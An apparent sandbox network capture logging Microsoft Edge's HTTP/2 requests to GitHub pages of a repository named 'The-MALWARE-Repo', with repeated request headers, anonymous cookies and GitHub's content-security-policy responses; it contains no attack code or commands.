content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: C83D:90F1B:5F78B0:6E3A2B:670163EB
GET

https://github.com/Da2dalus/The-MALWARE-Repo/spoofed_commit_check/02066b55d8b8271b199dbd1eb1a9b31fd38dfe71

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/spoofed_commit_check/02066b55d8b8271b199dbd1eb1a9b31fd38dfe71 HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no

Response

HTTP/2.0 204

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
x-github-request-id: C83D:90F1B:5F78B0:6E3A2D:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/hovercards/citation/sidebar_partial?tree_name=master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"75a11da44c802486bc6f65640aa48a73"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: a0cd8ccbdfb93e9af77e145e1ae6e77b8c460cb2545ca40647a08858d06f9f2a
accept-ranges: bytes
content-length: 33
x-github-request-id: C83D:90F1B:5F78B0:6E3A2C:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/used_by_list

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/used_by_list HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/fragment+html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: text/plain; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: C83D:90F1B:5F78B0:6E3A2E:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/refs?type=branch

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/refs?type=branch HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"56a3b41b3adb53ca7fce5703eb10dacf"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: a0cd8ccbdfb93e9af77e145e1ae6e77b8c460cb2545ca40647a08858d06f9f2a
accept-ranges: bytes
content-length: 97
x-github-request-id: C83D:90F1B:5F78D6:6E3A61:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/latest-commit/master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/latest-commit/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"adc2c0d060742993a54f31416bc951e3"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 79
x-github-request-id: C83D:90F1B:5F78D6:6E3A5E:670163ED
GET

https://github.com/Da2dalus/The-MALWARE-Repo/tree-commit-info/master

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/tree-commit-info/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=ZqbARjy4Rmbg7Ow5xEjO%2F77mdHafLRqYPUYHcRyBMgiay4IQ8Xa6YFfK99SiWrn9e43VUpQ5sXmH%2BLfBl5ueWFT6zL0Wyqb1Hfno2wLmE7mTvmLXt3mnV3lmhA9FwqD9if8p%2FbKXR3hsiMfT%2BcTGR1dkbJu5ECtVEYEF3HtjOLLcASqrVI2F0njHdakBRiEAvHBPbNHlMbjlXgaZQOhmkVRlIc3r7%2F4Vm22k66hHQSK1SJoJapOIQxYSfs9jKx8Y1Ub%2BXhwBb4HOR5dKl9ioPw%3D%3D--58jkFRRc0%2FTWnVTP--W9ZejJBijPX%2F%2BLzSZpjSmw%3D%3D
cookie: _octo=GH1.1.2142429092.1728144363
cookie: logged_in=no
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Sat, 05 Oct 2024 16:06:05 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"07da86d5c2d3c431a0aa2221ab777c22"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
